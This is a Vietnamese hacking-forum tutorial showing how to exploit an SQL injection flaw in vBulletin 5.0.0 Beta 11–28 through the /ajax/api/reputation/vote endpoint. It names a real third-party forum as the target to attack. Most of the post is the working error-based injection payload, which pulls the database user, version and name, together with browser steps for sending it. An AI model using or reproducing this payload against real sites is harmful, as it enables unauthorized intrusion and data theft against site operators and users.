SQLi vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

  1. Mickey

    Mickey Hacking For Hacker Staff Member

    [Tut] SQLi vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28

    exploit: http://huynhdegroup.net/@[email protected]/showthread.php?52-vBulletin-5-0-0-Beta-11-5-0-0-Beta-28-SQL
    video tut của Leebee: http://huynhdegroup.net/@[email protected]/showthread.php?63-Video-test-exploit-vbb5-by-LeeBee
    victim mượn của Leebee luôn :D : http://levronereport.com/forum/

    Làm cái tut khác người xíu đó là mọi người hay vào lấy exploit, lưu lại thành file .pl theo như tác giả của exploit viết và sài cũng là một cách.
    Nhưng hacking phải có tìm hiểu thêm, đào sâu thì mới có cái thú vị hơn và đây là cái thú vị đó. Mình sẽ hướng dẫn các bạn khai thác lỗi SQL injection của vBulletin 5.0.0 Beta mà không cần dùng Perl chỉ cần 1 cái trình duyệt firefox và addon hackbar:

    Tools: Firefox + addon hackbar
    path Exploit: /index.php/ajax/api/reputation/vote

    Bước 1: vào path exploit đầy đủ của victim
    vd: http://levronereport.com/forum/index.php/ajax/api/reputation/vote
    -> thấy lỗi sau là đúng:
    Mã:
    {"errors":[["unexpected_error","Required argument missing: nodeid"]]}
    Bước 2: Mở hackbar lên: firefox -> View -> Toolbars -> HackBars
    + Click vào Load URL.
    + Check vào Enable Post data

    Bước 3: bắt đầu truy vấn SQL injection vào cái khung Enable Post data.
    SQL querry:
    Mã:
    and(select 1 from(select count(*),concat((select (select concat(0x23,cast(concat(user(),0x3a,version(),0x3a,database()) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
    -> Click Execute -> thấy thông báo vẫn nằm chình ình
    Mã:
    {"errors":[["unexpected_error","Required argument missing: nodeid"]]}
    -> đơn giản là vì nó thiếu cái nodeid -> giải quyết bằng cách thêm nodid vào trước câu truy vấn là xong.
    SQL querry:
    Mã:
    nodeid=1 and(select 1 from(select count(*),concat((select (select concat(0x23,cast(concat(user(),0x3a,version(),0x3a,database()) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
    Bước 4: Xem kết quả thu được bằng cách kéo thanh trượt ngang ra giữa màn hình thì sẽ thấy những gì cần thấy.

    Hết - concobe - huynhdegroup.net - có leech thì leech luôn dòng này dùm hỉ :D
     

Share This Page